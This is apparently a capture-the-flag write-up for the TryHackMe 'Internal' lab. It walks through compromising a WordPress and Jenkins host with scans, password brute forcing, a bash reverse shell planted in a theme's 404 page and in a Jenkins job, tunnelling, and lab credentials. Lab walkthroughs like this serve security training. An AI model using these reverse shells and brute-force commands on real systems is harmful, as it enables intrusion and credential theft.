Internal

Room Link: https://tryhackme.com/room/internal

Scanning

Initial Scan

nmap -A 10.10.46.54

Scan all ports

No other ports found.

nmap -p- 10.10.46.54

TCP/80 - HTTP

gobuster dir -u http://10.10.46.54 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 30

Wordpress is running under both /blog and /wordpress. /blog has a login page

wpscan --url http://10.10.46.54
wpscan --url http://10.10.46.54/blog --passwords /usr/share/wordlists/rockyou.txt

Credentials found

Username: admin 
Password: my2boys

Trying to login the page redirects to internal.htm so I add that to the host file.

vi /etc/hosts

We are able to successfully get into wordpress with the credentials

Reverse Shell Failed Attempt

revshell.php code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'");
?>

vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443

Unable to upload the plugin due to write issues

Reverse Shell

TWENTY SEVENTEEN theme had a writable pages so I modified the 404 page with a reverse shell and then navigated to a page that does not exist.

Just added the revshell.php code mentioned earlier.

Kali

nc -lvnp 443

Browser

A page that doesn't exist to trigger the reverse shell.

http://www.internal.thm/blog/index.php/2020/08/03/hello-worlgd/

Get full TTY shell

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://10.10.120.18:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Linpeas was able to find two sets of credentials. phpmyadmin credentials worked.

phpmyadmin
Username: phpmyadmin                                                                                                                
Password: B2Ud4fEOZmVq

note 
Username: aubreanna
Password: bubb13guM!@#123

The note for Bill

cat /opt/wp-save.txt 

Able to ssh in with the credentials. There is a file that says that Jenkins is running and we can confirm that is is running with netstat as well.

ssh aubreanna@10.10.46.54
Password: bubb13guM!@#123
cat jenkins.txt
netstat -tuan

Pivot

From Kali I am now able to reach the Jenkins server

Option #1

For the rest of guide I used this option.

apt install sshuttle
sshuttle -r aubreanna@10.10.46.54 127.0.0.1/24
Password: bubb13guM!@#123

Option #2

If I followed this way jenkins would be redirected to port 4444 on kali.

ssh -L 4444:172.17.0.2:8080 aubreanna@10.10.46.54
Password: bubb13guM!@#123

Bruteforce

After checking for some time I couldn't find any files with credentials that worked and the jenkins server is being ran on docker and I had no access to anything for that so I resorted to using hydra. What I did was tried logging in with fake credentials than seeing the request and copying the info I needed to start bruteforcing.

File: /j_acegi_security_check
Request Body: j_username=test&j_password=pass&from=%2F&Submit=Sign+in
Failed login message: Invalid username or password

The default hydra was giving false positives and not getting the correct credentials so I downloaded from gitlab and ran the bruteforcing again.

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install

./hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P  /usr/share/wordlists/rockyou.txt

Credentials were found.

Username: admin
Password: spongebob

Jenkins Web

Just added a reverse shell to the job and ran it.

/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'

Kali

Setup a listener

nc -lvnp 443

Privilege Escalation

There was a note under opt for Aubreanna that had the credentials for root.

Username: root
Password: tr0ub13guM!@#123

Tried logging in with the credentials with ssh and it worked.

ssh root@10.10.56.152
Password: tr0ub13guM!@#123